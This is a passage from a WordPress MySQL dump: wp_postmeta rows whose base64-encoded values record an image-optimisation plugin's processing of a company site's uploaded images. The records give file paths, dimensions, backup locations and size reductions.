zU3MjU2MCwiaWQiOjEzNzJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TNC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1M0LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzQtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI1NjMsImlkIjoxMzcyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TNC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1M0LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNTY1LCJpZCI6MTM3Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1M0LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzQtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TNC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjU2NywiaWQiOjEzNzJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TNC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1M0LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzQtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI1NzAsImlkIjoxMzcyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TNC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1M0LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNTcyLCJpZCI6MTM3Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1M0LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzQtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TNC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjU3NSwiaWQiOjEzNzJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29579, 1371, 'wpfc_optimisation_reduction', '154775'); 
INSERT INTO `wp_postmeta` VALUES (29580, 1371, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMy5qcGciLCJ3aWR0aCI6MjYzMCwiaGVpZ2h0IjozODAwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzMuanBnIiwicmVkdWN0aW9uIjoxNTQ3NjEsInRpbWUiOjE0ODM1NzI1ODcsImlkIjoiMTM3MSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1MzLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNTkwLCJpZCI6MTM3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMy01NTR4ODAwLmpwZyIsIndpZHRoIjo1NTQsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MzLTU1NHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzMtNTU0eDgwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI1OTYsImlkIjoxMzcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MzLTc2OHgxMTEwLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6MTExMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMy03Njh4MTExMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TMy03Njh4MTExMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI1OTksImlkIjoxMzcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MzLTExMDd4MTYwMC5qcGciLCJ3aWR0aCI6MTEwNywiaGVpZ2h0IjoxNjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MzLTExMDd4MTYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TMy0xMTA3eDE2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNjAzLCJpZCI6MTM3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MzLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI2MDYsImlkIjoxMzcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MzLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TMy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjYwOCwiaWQiOjEzNzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1MzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNjExLCJpZCI6MTM3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MzLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI2MTQsImlkIjoxMzcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzMtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMy0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1MzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNjE3LCJpZCI6MTM3MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MzLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzMtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TMy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjYxOSwiaWQiOjEzNzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MzLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzMtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI2MjEsImlkIjoxMzcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzMtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMy0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1MzLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNjI0LCJpZCI6MTM3MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MzLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUzMtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TMy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjYyNywiaWQiOjEzNzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TMy00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1MzLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUzMtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI2MzAsImlkIjoxMzcxfV0='); 
INSERT INTO `wp_postmeta` VALUES (29581, 1370, 'wpfc_optimisation_reduction', '72155'); 
INSERT INTO `wp_postmeta` VALUES (29582, 1370, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzAzMDAzNjUuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDMwMDM2NS5qcGciLCJ3aWR0aCI6MzAwOCwiaGVpZ2h0IjoyMDAwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzAzMDAzNjUuanBnIiwicmVkdWN0aW9uIjo3MjE0MSwidGltZSI6MTQ4MzU3MjY0MCwiaWQiOiIxMzcwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDMwMDM2NS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wMzAwMzY1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzAzMDAzNjUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI2NDMsImlkIjoxMzcwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wMzAwMzY1LTgwMHg1MzIuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzAzMDAzNjUtODAweDUzMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDMwMDM2NS04MDB4NTMyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjY0NiwiaWQiOjEzNzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzAzMDAzNjUtNzY4eDUxMS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDMwMDM2NS03Njh4NTExLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wMzAwMzY1LTc2OHg1MTEuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNjQ4LCJpZCI6MTM3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDMwMDM2NS0xNjAweDEwNjQuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDMwMDM2NS0xNjAweDEwNjQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzAzMDAzNjUtMTYwMHgxMDY0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjY1MiwiaWQiOjEzNzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzAzMDAzNjUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDMwMDM2NS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wMzAwMzY1LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNjU1LCJpZCI6MTM3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDMwMDM2NS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wMzAwMzY1LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzAzMDAzNjUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI2NTcsImlkIjoxMzcwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wMzAwMzY1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzAzMDAzNjUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFn